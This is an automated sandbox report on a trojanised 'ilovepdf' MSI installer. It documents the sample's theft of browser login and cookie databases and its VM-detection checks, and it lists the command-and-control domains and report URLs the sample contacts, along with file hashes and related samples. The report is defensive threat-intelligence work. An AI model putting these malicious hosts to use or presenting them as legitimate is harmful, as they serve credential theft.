  • svchost.exe (34): contacts toa.mygametoa.com 34.64.183.91 (GOOGLE-AS-APGoogleAsiaPacificPteLtdSG, United States), 208.95.112.1 (TUT-ASUS, United States) and 3 other IPs or domains; drops C:\Users\user\AppData\...\Login Data.tmp (SQLite) and C:\Users\user\AppData\Local\...\Cookies.tmp (SQLite); signatures: Query firmware table information (likely to detect VMs); Tries to harvest and steal browser information (history, passwords, etc).

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
6rfyiAq0nM.msi | 31% | Virustotal |
6rfyiAq0nM.msi | 8% | Metadefender |
6rfyiAq0nM.msi | 36% | ReversingLabs | Win32.Trojan.Waldek

Dropped Files

Source | Detection | Scanner | Label
C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy) | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-30MA7.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-30MA7.tmp | 4% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp | 5% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp | 4% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp | 4% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp | 9% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp | 26% | ReversingLabs | Win32.Trojan.Generic

Unpacked PE Files

Source | Detection | Scanner | Label
13.2.rundll32.exe.4eb0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
37.2.svchost.exe.1afba170000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
20.2.svchost.exe.1d91aad0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
28.0.svchost.exe.1111ac00000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
24.0.svchost.exe.1dc51fb0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
28.2.svchost.exe.1111ac00000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
24.2.svchost.exe.1dc51fb0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
37.0.svchost.exe.1afba170000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
30.2.svchost.exe.1be5cd40000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
17.0.svchost.exe.204f3380000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
27.2.svchost.exe.2743a320000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
34.2.svchost.exe.202b28f0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
16.2.svchost.exe.12e17870000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
34.0.svchost.exe.202b28f0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
19.2.svchost.exe.233426d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
23.2.svchost.exe.28621cd0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
29.0.svchost.exe.22f12740000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
29.2.svchost.exe.22f12740000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
31.2.svchost.exe.21c23140000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
23.0.svchost.exe.28621cd0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
27.0.svchost.exe.2743a320000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
31.0.svchost.exe.21c23140000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
17.2.svchost.exe.204f3380000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
21.0.svchost.exe.2f2c5c00000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
38.0.svchost.exe.25c96c80000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
25.2.svchost.exe.2216b8b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
30.0.svchost.exe.1be5cd40000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
22.0.svchost.exe.222cab20000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
22.2.svchost.exe.222cab20000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
14.2.svchost.exe.24b7d0d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
19.0.svchost.exe.233426d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
21.2.svchost.exe.2f2c5c00000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
38.2.svchost.exe.25c96c80000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
25.0.svchost.exe.2216b8b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
14.0.svchost.exe.24b7d0d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
20.0.svchost.exe.1d91aad0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2

Domains

Source | Detection | Scanner | Label
toa.mygametoa.com | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
https:///xboxlive.com | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chromedisplayurl | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://fg.mygameagend.com/report7.4.php | 6% | Virustotal |
https://fg.mygameagend.com/report7.4.php | 0% | Avira URL Cloud | safe
https://bh.mygameadmin.com/ | 0% | Avira URL Cloud | safe
https:///live.com | 0% | Avira URL Cloud | safe
https://fg.mygameagend.com/ | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
https://www.remobjects.com/ps | 0% | URL Reputation | safe
http://subca.ocsp-certum.com01 | 0% | URL Reputation | safe
https://www.innosetup.com/ | 0% | URL Reputation | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
https://jrsoftware.org0 | 0% | Avira URL Cloud | safe
https://bh.mygameadmin.com/report7.4.phpile | 0% | Avira URL Cloud | safe
https://login.windows.netll | 0% | Avira URL Cloud | safe
https://login.windows.netm | 0% | Avira URL Cloud | safe
https://pcbmhome.com/click.php?cnv_id=%s&cl=%d | 0% | Avira URL Cloud | safe
https://login.windows.netB7E5B | 0% | Avira URL Cloud | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
http://w.ijg. | 0% | Avira URL Cloud | safe
https://bh.mygameadmin.com/report7.4.php | 0% | Avira URL Cloud | safe
https://p-api.com/json/?fields=8198 | 0% | Avira URL Cloud | safe
http://cscasha2.ocsp-certum.com04 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
https:///windows.net | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
https://fg.mygameagend.com/dll | 0% | Avira URL Cloud | safe
https://xsts.auth.xboxlive.com2 | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
toa.mygametoa.com | 34.64.183.91 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://fg.mygameagend.com/report7.4.php | true | 6%, Virustotal; Avira URL Cloud: safe | unknown
https://bh.mygameadmin.com/report7.4.php | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | MSIFBC3.tmp, 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, 6rfyiAq0nM.msi | false | | high
https://login.windows.net | svchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_realaudio/vnd.rn-realaudiovideo/vnd.rn-realvideoaudio/x- | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https:///xboxlive.com | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://support.google.com/chrome/?p=plugin_javaapplication/x-java-appletapplication/x-java-applet;j | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://repository.certum.pl/cscasha2.cer0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
http://www.interoperabilitybridges.com/wmp-extension-for-chromedisplayurl | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_wmp | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://ocsp.sectigo.com0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_pdfapplication/pdfapplication/vnd.adobe.x-marsapplicatio | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://forms.real.com/real/realone/download.html?type=rpsp_ushttp://service.real.com/realplayer/secu | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/answer/6258784 | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://xsts.auth.xboxlive.com | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_quicktimeapplication/sdpapplication/x-mpegapplication/x- | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_flash | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://bh.mygameadmin.com/ | svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_java | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdline | MSIFBC3.tmp | false | | high
https:///live.com | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://support.google.com/chrome/?p=plugin_real | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://fg.mygameagend.com/ | svchost.exe, 00000010.00000002.828608076.0000012E1962A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.remobjects.com/ps | MSIFBC3.tmp, MSIFBC3.tmp.10.dr | false | URL Reputation: safe | unknown
http://subca.ocsp-certum.com01 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
https://www.innosetup.com/ | MSIFBC3.tmp, MSIFBC3.tmp, 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, MSIFBC3.tmp.10.dr | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_pdf | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://sectigo.com/CPS0D | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_divx | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://jrsoftware.org0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | Avira URL Cloud: safe | unknown
https://jrsoftware.org/ | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
https://bh.mygameadmin.com/report7.4.phpile | svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://forms.real.com/real/realone/download.html?type=rpsp_us | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://www.certum.pl/CPS0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
https://login.windows.netll | svchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://login.windows.netm | svchost.exe, 00000022.00000000.394067819.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://pcbmhome.com/click.php?cnv_id=%s&cl=%d | svchost.exe | false | Avira URL Cloud: safe | unknown
https://login.windows.netB7E5B | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://repository.certum.pl/ctnca.cer09 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
https://support.google.com/chrome/?p=plugin_quicktime | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid8.9mverp=https://bh. | svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp | false | | high
http://crl.certum.pl/ctnca.crl0k | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exerequires_authorizationstatus | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000011.00000002.533096417.00000204EFAAD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://w.ijg. | is-30MA7.tmp.11.dr, is-UKPSI.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_divxvideo/x-matroskavideo/divx | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://www.certum.pl/CPS0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
http://crl.certum.pl/cscasha2.crl0q | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
https://login.windows.net/7E5B | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | | high
https://p-api.com/json/?fields=8198 | svchost.exe, 00000010.00000003.421876578.0000012E1764D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://cscasha2.ocsp-certum.com04 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
https://login.windows.net/ | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmp | false | | high
http://service.real.com/realplayer/security/02062012_player/en/ | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_shockwaveapplication/x-director | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_shockwave | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://ip-api.com/json/?fields=8198 | svchost.exe | false | | high
https:///windows.net | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
https://fg.mygameagend.com/dll | svchost.exe, 00000010.00000002.828608076.0000012E1962A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_wmpWindows | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://www.instagram.com/accounts/edit/ | svchost.exe | false | | high
https://xsts.auth.xboxlive.com2 | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_flashapplication/futuresplashapplication/x-shockwave-fla | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://xsts.auth.xboxlive.com/ | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | | high

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | unknown | United States | 53334 | TUT-ASUS | false
172.67.167.122 | unknown | United States | 13335 | CLOUDFLARENETUS | false
34.64.183.91 | toa.mygametoa.com | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | true
104.21.75.46 | unknown | United States | 13335 | CLOUDFLARENETUS | false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 508222
Start date: 24.10.2021
Start time: 12:48:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 23s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 6rfyiAq0nM (renamed file extension from none to msi)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal74.troj.spyw.evad.winMSI@10/39@2/5
EGA Information: Failed
HDC Information:
  • Successful, ratio: 26.2% (good quality ratio 22.7%)
  • Quality average: 60.6%
  • Quality standard deviation: 33.8%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Override analysis time to 240s for rundll32
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe, wuapihost.exe
  • Not all processes were analyzed, report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

Time     | Type            | Description
12:50:06 | API Interceptor | 68x Sleep call for process: svchost.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

Match: 208.95.112.1

Associated Sample Name / URL | Detection | Context
NaVEQ76t88.exe | malicious | ip-api.com/json/
7PPXbfDkRN.exe | malicious | ip-api.com/json/
kBbwXpCn0c.exe | malicious | ip-api.com/json/
13294_Video_Oynat#U0131c#U0131.apk | malicious | ip-api.com/json
Comprobante de pago.xls | malicious | ip-api.com/json/
Comprobante de pago.doc | malicious | ip-api.com/json/
Pv9HB349oG.exe | malicious | ip-api.com/json
PozfYoUNtW.exe | malicious | ip-api.com/json
DiscordSniper.exe | malicious | ip-api.com//json/102.129.143.33
Nightmare Booter (DDos) [IP Stresser] (1).exe | malicious | ip-api.com//json/102.129.143.33
HazardNuker.exe | malicious | ip-api.com/line/?fields=hosting
2wY8F2BCNp.exe | malicious | ip-api.com/json
7WVpng6phO.exe | malicious | ip-api.com/json/
Comprobante de pago (OCT).xls | malicious | ip-api.com/json/
tywt33OZI0.exe | malicious | ip-api.com/json
7mqSo6rtA0.exe | malicious | ip-api.com/json
nIXnNtZvtI.exe | malicious | ip-api.com/json/
nKnpb3gEQR.exe | malicious | ip-api.com/json/
Xg4Pb7Cx99.exe | malicious | ip-api.com/json
z7PRVhbVyw.exe | malicious | ip-api.com/json

                                                                                  Domains

Match: toa.mygametoa.com

Associated Sample Name / URL | Detection | Context
qx881BiW17.exe | malicious | 34.64.183.91
1FR4w7fupN.exe | malicious | 34.64.183.91
TXlftr6Hv6.exe | malicious | 34.64.183.91
TcTyP2kvmh.exe | malicious | 34.64.183.91
pVdP9RRNeY.exe | malicious | 34.64.183.91
ZEKk2t5fJt.exe | malicious | 34.64.183.91
dBJ2dwRpl5.exe | malicious | 34.64.183.91
Fr6yaDjoE5.exe | malicious | 34.64.183.91
9ubsb7p6h1.exe | malicious | 34.64.183.91
AeXXqhQNJKur7teIlOrvF329.exe | malicious | 34.64.183.91
uFvG6DlSUpNCq_0a0Y3vNrYQ.exe | malicious | 34.64.183.91
UfZQclP1sP8dkdmyrez2O3E7.exe | malicious | 34.64.183.91
setup_x86_x64_install.exe | malicious | 34.64.183.91
TNIZtb3HS3.exe | malicious | 34.64.183.91
setup_x86_x64_install.exe | malicious | 34.64.183.91
setup_x86_x64_install.exe | malicious | 34.64.183.91
yT6sVqj4WT.exe | malicious | 34.64.183.91
28jJSvNzXz.exe | malicious | 34.64.183.91
82Iqbsw9vI.exe | malicious | 34.64.183.91

                                                                                  ASN

Match: CLOUDFLARENETUS

Associated Sample Name / URL | Detection | Context
Qxioyfdvub.dll | malicious | 172.67.69.19
r7gJpNwSL8.exe | malicious | 162.159.134.233
qx881BiW17.exe | malicious | 104.21.85.99
Minutes of Meeting 23.10.2021.exe | malicious | 172.67.218.79
021d14981d2829df6914d5c43e9aed8b8c7a80f2d7e03.exe | malicious | 104.21.57.122
A8mFRoXAow.exe | malicious | 162.159.130.233
pe8mHCKX5x.exe | malicious | 104.21.66.135
a91bc84dd26784dc82b1ee55b50dc3016738a09fa0f6c.exe | malicious | 162.159.130.233
Xnzm5rS5hN.dll | malicious | 172.67.70.134
FoxMod.exe | malicious | 162.159.130.233
Far Cry 6.exe | malicious | 162.159.129.233
Installer Far Cry 6.exe | malicious | 162.159.129.233
1mOcqzZcoH.exe | malicious | 104.21.57.252
365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exe | malicious | 162.159.129.233
C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe | malicious | 104.21.51.48
H1GC5Z4C39PAYMENTRECEIPT.exe | malicious | 162.159.135.233
setup_x86_x64_install.exe | malicious | 162.159.134.233
Loader.exe | malicious | 162.159.129.233
Bitcoin Mining Software 1.5v.exe | malicious | 162.159.130.233
HWIDSpoofer.exe | malicious | 162.159.135.233

Match: TUT-ASUS

Associated Sample Name / URL | Detection | Context
NaVEQ76t88.exe | malicious | 208.95.112.1
7PPXbfDkRN.exe | malicious | 208.95.112.1
kBbwXpCn0c.exe | malicious | 208.95.112.1
C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe | malicious | 208.95.112.1
setup_x86_x64_install.exe | malicious | 208.95.112.1
13294_Video_Oynat#U0131c#U0131.apk | malicious | 208.95.112.1
Fri051e1e7444.exe | malicious | 208.95.112.1
Comprobante de pago.xls | malicious | 208.95.112.1
Comprobante de pago.doc | malicious | 208.95.112.1
wA5D1yZuTf.exe | malicious | 208.95.112.1
Pv9HB349oG.exe | malicious | 208.95.112.1
setup_x86_x64_install.exe | malicious | 208.95.112.1
PozfYoUNtW.exe | malicious | 208.95.112.1
DiscordSniper.exe | malicious | 208.95.112.1
Nightmare Booter (DDos) [IP Stresser] (1).exe | malicious | 208.95.112.1
HazardNuker.exe | malicious | 208.95.112.1
2wY8F2BCNp.exe | malicious | 208.95.112.1
7WVpng6phO.exe | malicious | 208.95.112.1
Comprobante de pago (OCT).xls | malicious | 208.95.112.1
tywt33OZI0.exe | malicious | 208.95.112.1

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

C:\Config.Msi\3cf0a7.rbs
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: modified
Size (bytes): 615
Entropy (8bit): 5.3690495067446395
Encrypted: false
SSDEEP: 12:EgyGgEpYc4X6PRPdRYj//1XIX66nfN2zWotHMpheXpY/N3HDyzgj8Q:7gT6PjRYjFX+6Z65pLFyzAL
MD5: 49EF9B783C8394431D1AC50A9C332786
SHA1: 3299F9F1CAA218453F8A522DCB201EF724822DB9
SHA-256: 205F7FC09B3D0A887300CB9BC36632CAC2E8AD4DDBC42564A293CE41C78F86B6
SHA-512: 50D8AB1E8D3F7E9FBD70528F2EBCF8DBB4DA606D2539413748105E1016C9D7DE36AF68B0B88EC21D3F58A9F165C9A94B3BADD31EBED5CE9EC5B937AF124EE6CD
Malicious: false
                                                                                  Preview: ...@IXOS.@.....@$fXS.@.....@.....@.....@.....@.....@......&.{D0D5A8D4-2C54-41FD-A0C3-50CC56973D60}..exe2msiSetupPackage..6rfyiAq0nM.msi.@.....@.....@.....@........&.{CDFF8FBF-8895-4382-936D-A20B4780ACE1}.....@.....@.....@.....@.......@.....@.....@.......@......exe2msiSetupPackage......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}&.{D0D5A8D4-2C54-41FD-A0C3-50CC56973D60}.@........RemoveODBC..Removing ODBC components..%._B3D13F97_1369_417D_A477_B4C42B829328...@.....@.....@....
C:\Program Files (x86)\ilovepdf\Log.uni (copy)
Process: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 484
Entropy (8bit): 3.262742514495205
Encrypted: false
SSDEEP: 3:fI+PciIrJRFWEXoPcZ0qLJxpPcZ0qm/LVpPcZ0qHJxpPcZ0qc/8Xn+PcoINJRFOy:pSJRRBNaE/LsBa+/G1JREovn
MD5: 147C02BD59F90777A43F77C711145711
SHA1: 299BC5A77CF4BB06FE123F70FC1EC643ECA6FCC2
SHA-256: F7077388D0CC1928FA1759C91A5396D87D282A78843F1330456FB3809C2E12FA
SHA-512: 7A274D979C67437C9CD4148C85C7FBC62D2DEFF26E730158D93F3EBF3B89A070A415305DC708FBE9991EF0BB0C870D13518887E17DCF937C54A7F6AFF83A8D97
Malicious: false
                                                                                  Preview: #-------------------2021-10-11 19:01:13-------------------#program start..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary th.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary ti.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary tt.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary tw.dll Error:126..#-------------------2021-10-11 19:01:17-------------------#program end..
C:\Program Files (x86)\ilovepdf\config.xml (copy)
Process: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 288
Entropy (8bit): 4.155730210419504
Encrypted: false
SSDEEP: 6:iNofEsshqwofAhd/2vWOZCvRSaubS8JvObSyo8du:i6fdso9wl2vhZ+RSdOYmO78du
MD5: B5D5DA176844BFE5FA47A1727E7CB8BC
SHA1: A7B7EE512E6DBC46603CD7830152C69D39D2CACB
SHA-256: FC0D68DD98F86BEA1B9699424FCE2C5F747E31419451404E9A9B83ED13394D42
SHA-512: BC1A5D218DA9D6BE1CACF237C522D98190C76C946A080F3555B94217EBA112A1995D3AB4710D605937171C3A7D85B28FA874C699B00EB367BACC6E5241CA5503
Malicious: false
                                                                                  Preview: <config>.. <UserDefine>.. <Language ID="0" />.. <Path PathSet="2" Path="" />.. <ImageFormat set="2" />.. <Res set="96" />.. <bit set="24" />.. <Prefix set="" />.. <Doc set="1" />.. <Help set="1" />.. </UserDefine>..</config>..
C:\Program Files (x86)\ilovepdf\easyConverter.rsc (copy)
Process: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
File Type: data
Category: dropped
Size (bytes): 6728
Entropy (8bit): 7.972168290563647
